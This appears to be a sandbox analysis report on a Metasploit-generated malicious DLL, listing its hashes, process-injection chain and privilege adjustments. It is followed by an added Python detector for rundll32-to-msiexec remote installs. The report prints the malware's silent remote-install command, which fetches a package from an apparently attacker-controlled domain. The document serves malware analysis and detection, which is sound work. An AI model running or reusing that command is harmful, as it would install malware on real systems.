Analysis

max time kernel: 39s
max time network: 42s
platform: windows7_x64
resource: win7-20220715-en
resource tags: arch:x64, arch:x86, image:win7-20220715-en, locale:en-us, os:windows7-x64, system
submitted: 24-07-2022 17:23
Behavioral task: behavioral1
  Sample: 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
  Resource: win7-20220715-en

Behavioral task: behavioral2
  Sample: 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
  Resource: win10v2004-20220721-en
General

Target: 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Size: 5KB
MD5: f768a1ec913aea0915bcc20c17896be3
SHA1: a362956664379ff9860a3c56fb1daf6e000220c4
SHA256: 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a
SHA512: 9fa8de6d9c4736dd0300e334137d3e60e42860f7b70dd452b35d515b3d7ebca0ef942d3bc65613d6be8e91a4f93c4c58b4e81d99649a9941cfafb46185f6dc9d
Malware Config

Extracted
  Family: metasploit
  Payload: windows/single_exec
Signatures

MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Use of msiexec (install) with remote resource (1 IoC)
  Processes:
    PID 1224  msiexec.exe

Suspicious use of SetThreadContext (1 IoC)
  Processes:
    PID 1644 rundll32.exe set thread context of PID 960 rundll32.exe

Suspicious use of AdjustPrivilegeToken (34 IoCs)
  Processes:
    PID 1224 msiexec.exe (31 token adjustments, in order): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
    PID 1504 msiexec.exe (3 token adjustments): SeRestorePrivilege, SeTakeOwnershipPrivilege, SeSecurityPrivilege

Suspicious use of WriteProcessMemory (22 IoCs)
  Processes:
    PID 1564 rundll32.exe wrote to memory of PID 1644 rundll32.exe (7 events)
    PID 1644 rundll32.exe wrote to memory of PID 960 rundll32.exe (8 events)
    PID 960 rundll32.exe wrote to memory of PID 1224 msiexec.exe (7 events)
Processes

(PIDs taken from the WriteProcessMemory and AdjustPrivilegeToken signature tables above; indentation shows the parent/child tree.)

C:\Windows\system32\rundll32.exe  (PID 1564)
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#1
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\rundll32.exe  (PID 1644)
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#1
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\rundll32.exe  (PID 960)
      rundll32.exe
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\msiexec.exe  (PID 1224)
        msiexec /i https://dl.eqwauemt.com/Downupdatesoftmakerup.jpg /q
        - Use of msiexec (install) with remote resource
        - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\msiexec.exe  (PID 1504, the only other msiexec.exe in the report)
  C:\Windows\system32\msiexec.exe /V
  - Suspicious use of AdjustPrivilegeToken
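The tree above has two detectable features that the signatures name separately: msiexec.exe being asked to install from a remote URL (the `.jpg` extension carries no weight, msiexec fetches the resource and treats it as an installer package, so a rule keyed on `.msi` would miss this sample), and a rundll32.exe that spawns a second rundll32.exe with no DLL argument, writes to it and sets its thread context before that child launches msiexec. The first system32 to SysWOW64 rundll32 hop is the normal behaviour of 64-bit rundll32 handing a 32-bit DLL to its WOW64 counterpart; the 1644 to 960 hop is the one that matters. The following is an added example, not part of the sandbox report or of any vendor's rule set: a small Python detector run over constructed process-creation events that mirror this report's tree. The PIDs, images and command lines for 1564, 1644, 960, 1224 and 1504 come from the report; the parent PIDs 1000 and 600, the two benign control events and the rule names are assumptions.

```python
"""Detect msiexec remote installs and rundll32 -> rundll32 -> msiexec chains
from process-creation telemetry (Sysmon Event ID 1 / 4688-style fields).
Added example; the events below are constructed, not captured telemetry."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # command line as logged

DLL = (r"C:\Users\Admin\AppData\Local\Temp"
       r"\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll")

# Constructed sample modelled on the report's process tree. PIDs 1564, 1644,
# 960, 1224 and 1504 and their command lines are from the report; parent PIDs
# 1000 (assumed explorer.exe) and 600 (assumed services.exe) and the two
# benign control events (2000, 2001) are assumptions.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1564, 1000, r"C:\Windows\system32\rundll32.exe", f"rundll32.exe {DLL},#1"),
    ProcEvent(1644, 1564, r"C:\Windows\SysWOW64\rundll32.exe", f"rundll32.exe {DLL},#1"),
    ProcEvent(960, 1644, r"C:\Windows\SysWOW64\rundll32.exe", "rundll32.exe"),
    ProcEvent(1224, 960, r"C:\Windows\SysWOW64\msiexec.exe",
              "msiexec /i https://dl.eqwauemt.com/Downupdatesoftmakerup.jpg /q"),
    ProcEvent(1504, 600, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    ProcEvent(2000, 1000, r"C:\Windows\system32\msiexec.exe",
              r"msiexec /i C:\Users\Admin\Downloads\tool.msi /qn"),
    ProcEvent(2001, 1000, r"C:\Windows\system32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

# A URL anywhere on the command line; the extension is deliberately ignored.
REMOTE_URI = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
# msiexec's install switch, with either switch character: /i, -i, /package, -package
INSTALL_SWITCH = re.compile(r"(?:^|\s)[/-](?:i|package)(?=\s|$)", re.IGNORECASE)

def image_name(ev: ProcEvent) -> str:
    return ev.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def remote_msi_uri(ev: ProcEvent) -> Optional[str]:
    """URL msiexec was told to install from, or None if this is not such an event."""
    if image_name(ev) != "msiexec.exe" or not INSTALL_SWITCH.search(ev.cmdline):
        return None
    m = REMOTE_URI.search(ev.cmdline)
    return m.group(0) if m else None

def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent chain of pid, nearest parent first; stops at unknown PIDs or loops."""
    chain, seen, ev = [], {pid}, by_pid.get(pid)
    while ev is not None and ev.ppid not in seen:
        parent = by_pid.get(ev.ppid)
        if parent is None:
            break
        chain.append(parent)
        seen.add(parent.pid)
        ev = parent
    return chain

def rundll32_spawns_rundll32(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    parent = by_pid.get(ev.ppid)
    return parent is not None and image_name(ev) == "rundll32.exe" == image_name(parent)

def detect(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) findings in event order."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[str, int, str]] = []
    for ev in events:
        if rundll32_spawns_rundll32(ev, by_pid):
            findings.append(("rundll32_spawns_rundll32", ev.pid, f"parent pid {ev.ppid}"))
        uri = remote_msi_uri(ev)
        if uri:
            findings.append(("msiexec_remote_install", ev.pid, uri))
            names = [image_name(a) for a in ancestry(ev.pid, by_pid)]
            if "rundll32.exe" in names:  # remote install launched from under rundll32
                findings.append(("remote_msi_from_rundll32_chain", ev.pid, " <- ".join(names)))
    return findings

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid:<5} {detail}")
```

On the constructed sample this flags 1644 and 960 (rundll32 children of rundll32), and 1224 twice (remote install, and remote install with a rundll32 ancestry of 960, 1644, 1564). PID 1504 (`msiexec /V`, no install switch) and the local `tool.msi` install are not flagged. The ancestry walk is what separates this loader from a user double-clicking an installer: matching on the command line alone would also catch a legitimate `msiexec /i https://vendor/...` push from a management tool, so the chain rule is the one worth alerting on with high confidence.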
Downloads

memory/960-56-0x000000000062178C-mapping.dmp
memory/1224-58-0x0000000000000000-mapping.dmp
memory/1504-60-0x000007FEFC211000-0x000007FEFC213000-memory.dmp (8KB)
memory/1644-54-0x0000000000000000-mapping.dmp
memory/1644-55-0x00000000763E1000-0x00000000763E3000-memory.dmp (8KB)